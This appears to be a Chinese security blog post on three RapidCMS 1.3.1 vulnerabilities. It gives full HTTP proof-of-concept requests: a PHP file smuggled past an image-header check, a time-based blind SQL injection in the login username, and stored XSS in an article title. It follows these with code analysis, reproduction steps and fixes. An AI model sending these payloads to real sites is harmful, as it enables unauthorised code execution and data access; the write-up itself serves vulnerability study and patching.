RapidCMS 几个常见漏洞

侵权声明
本文章中的所有内容（包罗但不限于文字、图像和其他媒体）仅供教诲和参考目的。假如在本文章中利用了任何受版权保护的材料，我们满怀敬意地承认该内容的版权归原作者所有。
假如您是版权持有人，并且认为您的作品被侵犯，请通过以下方式与我们联系： [360619623@qq.com]。我们将在确认后的合理时间内采取适当措施，包罗删除相关内容。
感谢您的理解与支持

系统漏洞文件及版本


版本

1.3.1

漏洞分类


文件上传

/admin/config/uploadicon.php

POC

1. POST /admin/config/uploadicon.php HTTP/1.1
2. Host: demo.com
3. Content-Length: 206
4. Cache-Control: max-age=0
5. Upgrade-Insecure-Requests: 1
6. Origin: http://demo.com
7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAxJMuwJhNP6DOZPr
8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
10. Referer: http://demo.com/admin/config/setting.php
11. Accept-Encoding: gzip, deflate, br
12. Accept-Language: zh-CN,zh;q=0.9
13. Cookie: deviceid=1722062988348; xinhu_ca_rempass=0; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1723172185; csrf_358693=2df7a84f; SECKEY_ABVK=OwAgykiuZ90JyymTDay7TVxsu9K7i77SDQ1wYucKShE%3D; BMAP_SECKEY=zsabggfKizJ7RMP-whUACbv-8Y8e5RtMYzyqN6tgzDDcqlIgvjPYXLThdapgeYvMI5gtvLD423X1mOjreODpLfh2LBSqd-MfWUOnirBpX6X5MhDcI2h78cg9SCeZlworW5OtN5Li7126gdR5a9n2B0G1H09Eu9K-e5yMSsxdwbkojLGWbNKpJSNGySLmO3bA; lang=zh-cn; vision=rnd; device=desktop; theme=default; hideMenu=false; preExecutionID=3; executionTaskOrder=status%2Cid_desc; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1723680035; http304ok=1; qebak_loginlangid=1; csrf_f2b6b4=adc34ccd; downloading=null; storyModuleParam=0; storyProductParam=0; storyBranchParam=0; executionStoryOrder=order_desc; storyPreExecutionID=3; docSpaceParam=%7B%22type%22%3A%22execution%22%2C%22objectID%22%3A%223%22%2C%22libID%22%3A%227%22%2C%22moduleID%22%3A%220%22%2C%22browseType%22%3A%22%22%2C%22param%22%3A%220%22%7D; lastDocModule=0; lastProject=2; docFilesViewType=list; tab=doc; xinhu_ca_adminuser=admin; xinhu_mo_adminid=eg0el0gx0ttm0tut0et0mx0ml0ea0el0tuj0tuj0ee0tua0ew0mg09; admin=Y4W4R2t0a9Wa46O0O0Oa
14. Connection: keep-alive
16. ------WebKitFormBoundaryAxJMuwJhNP6DOZPr
17. Content-Disposition: form-data; name="file"; filename="phpinfo.php"
18. Content-Type: image/png
20. ‰PNG<?php phpinfo();?>
21. ------WebKitFormBoundaryAxJMuwJhNP6DOZPr--

复制代码

SQL注入

/resource/runlogin.php
该系统还有其他地方有sql注入，你也可以去挖挖

POC

1. POST /resource/runlogin.php?goto=http://demo.com/index.php HTTP/1.1
2. Host: demo.com
3. Content-Length: 70
4. Cache-Control: max-age=0
5. Upgrade-Insecure-Requests: 1
6. Origin: http://demo.com
7. Content-Type: application/x-www-form-urlencoded
8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
10. Referer: http://demo.com/index.php
11. Accept-Encoding: gzip, deflate, br
12. Accept-Language: zh-CN,zh;q=0.9
13. Cookie: deviceid=1722062988348; xinhu_ca_rempass=0; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1723172185; csrf_358693=2df7a84f; SECKEY_ABVK=OwAgykiuZ90JyymTDay7TVxsu9K7i77SDQ1wYucKShE%3D; BMAP_SECKEY=zsabggfKizJ7RMP-whUACbv-8Y8e5RtMYzyqN6tgzDDcqlIgvjPYXLThdapgeYvMI5gtvLD423X1mOjreODpLfh2LBSqd-MfWUOnirBpX6X5MhDcI2h78cg9SCeZlworW5OtN5Li7126gdR5a9n2B0G1H09Eu9K-e5yMSsxdwbkojLGWbNKpJSNGySLmO3bA; lang=zh-cn; vision=rnd; device=desktop; theme=default; hideMenu=false; preExecutionID=3; executionTaskOrder=status%2Cid_desc; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1723680035; http304ok=1; qebak_loginlangid=1; csrf_f2b6b4=adc34ccd; downloading=null; storyModuleParam=0; storyProductParam=0; storyBranchParam=0; executionStoryOrder=order_desc; storyPreExecutionID=3; docSpaceParam=%7B%22type%22%3A%22execution%22%2C%22objectID%22%3A%223%22%2C%22libID%22%3A%227%22%2C%22moduleID%22%3A%220%22%2C%22browseType%22%3A%22%22%2C%22param%22%3A%220%22%7D; lastDocModule=0; lastProject=2; docFilesViewType=list; tab=doc; xinhu_ca_adminuser=admin; xinhu_mo_adminid=eg0el0gx0ttm0tut0et0mx0ml0ea0el0tuj0tuj0ee0tua0ew0mg09; admin=Y4W4R2t0a9Wa46O0O0Oa
14. Connection: keep-alive
16. username=' or if(length(database())>4,sleep(2),1)#&password=12345&sub=

复制代码

XSS

/admin/article/article-add-run.php

POC

1. POST /admin/article/article-add-run.php HTTP/1.1
2. Host: demo.com
3. Content-Length: 115
4. Cache-Control: max-age=0
5. Upgrade-Insecure-Requests: 1
6. Origin: http://demo.com
7. Content-Type: application/x-www-form-urlencoded
8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
10. Referer: http://demo.com/admin/article/article-add.php
11. Accept-Encoding: gzip, deflate, br
12. Accept-Language: zh-CN,zh;q=0.9
13. Cookie: deviceid=1722062988348; xinhu_ca_rempass=0; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1723172185; csrf_358693=2df7a84f; SECKEY_ABVK=OwAgykiuZ90JyymTDay7TVxsu9K7i77SDQ1wYucKShE%3D; BMAP_SECKEY=zsabggfKizJ7RMP-whUACbv-8Y8e5RtMYzyqN6tgzDDcqlIgvjPYXLThdapgeYvMI5gtvLD423X1mOjreODpLfh2LBSqd-MfWUOnirBpX6X5MhDcI2h78cg9SCeZlworW5OtN5Li7126gdR5a9n2B0G1H09Eu9K-e5yMSsxdwbkojLGWbNKpJSNGySLmO3bA; lang=zh-cn; vision=rnd; device=desktop; theme=default; hideMenu=false; preExecutionID=3; executionTaskOrder=status%2Cid_desc; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1723680035; http304ok=1; qebak_loginlangid=1; csrf_f2b6b4=adc34ccd; downloading=null; storyModuleParam=0; storyProductParam=0; storyBranchParam=0; executionStoryOrder=order_desc; storyPreExecutionID=3; docSpaceParam=%7B%22type%22%3A%22execution%22%2C%22objectID%22%3A%223%22%2C%22libID%22%3A%227%22%2C%22moduleID%22%3A%220%22%2C%22browseType%22%3A%22%22%2C%22param%22%3A%220%22%7D; lastDocModule=0; lastProject=2; docFilesViewType=list; tab=doc; xinhu_ca_adminuser=admin; xinhu_mo_adminid=eg0el0gx0ttm0tut0et0mx0ml0ea0el0tuj0tuj0ee0tua0ew0mg09; admin=Y4W4R2t0a9Wa46O0O0Oa
14. Connection: keep-alive
16. id=eMU9DDcw3b&title=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&categoryid=1&file=&content=%3Cp%3E%3Cbr%3E%3C%2Fp%3E

复制代码

分析


文件上传

找到文件位置

起首看到isImg()函数。打开图片文件读取前面两个字节，然后判断是否为jpg、gif、png的文件头。就没有其他判断和过滤了。生存文件的后缀也是直接从传入的文件获取的，虽然文件名是随机数举行MD5运算后的。但是生存后的文件名是完全暴露在前端的。

SQL注入

找到文件位置

可以看到通过POST方法获取username参数赋值给name参数。在后续name参数直接和sql语句拼接。之后通过mysqli_query()函数实行了。假如利用时间盲注会停顿双倍的时间，因为后面还有一个sleep(2);语句所以还会多停顿2秒。

XSS

找到文件位置

可以看到通过POST方法获取title参数并且通过rawurlencode()函数对字符串举行 URL 编码。之后与sql语句拼接并实行sql语句生存到数据库中。
看到显示文章的php文件

可以看到从rapidcmspage数据库中获取所以文章的基本信息。后续将每一个篇文章的信息赋值给raw数组，其中raw[1]是标题并举行了URL解密。直接输出到前端了。

复现


文件上传

1、找到文件上传的位置

2、上传一个png或jpg后缀的文件，内容必须是图片的文件头(可以利用010改)，其他内容任意。然后用bp抓包，修改上传上来的文件名后缀。

3、回答上传文件的地方，查察上传文件的文件名

4、访问并利用

SQL注入

1、找到前台登录的接口

2、随便输入暗码和账号，或是直接在账号出输入sql命令。

3、修改数据包并放行

XSS

1、找到文章新增的位置，并在标题处写入js代码并提交

2、访问查察文章就会触发js

修复

文件上传

判断文件后缀并设置白名单
SQL注入

过滤关键函数或是利用预编译
XSS

对输入进来的特殊字符举行html编码
总结

感觉总体还是比较简朴的，其中的sql注入还是很多的。

参考

CVE-2023-5262
免责声明
本博客所提供的技能知识和信息仅旨在教诲和分享网络安全最佳实践，促进网络安全意识的提拔。作者严禁将这些技能和信息用于任何非法或不道德的目的。
利用本博客内容而导致的任何违法行为或结果，作者不承担当何法律责任。所有读者在利用本博客的信息时，应自行承担风险，并确保遵守当地法律法规。
我们鼓励所有读者合法地利用所提供的信息和技能，致力于维护安全和负责任的网络环境。
感谢您的理解与支持。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。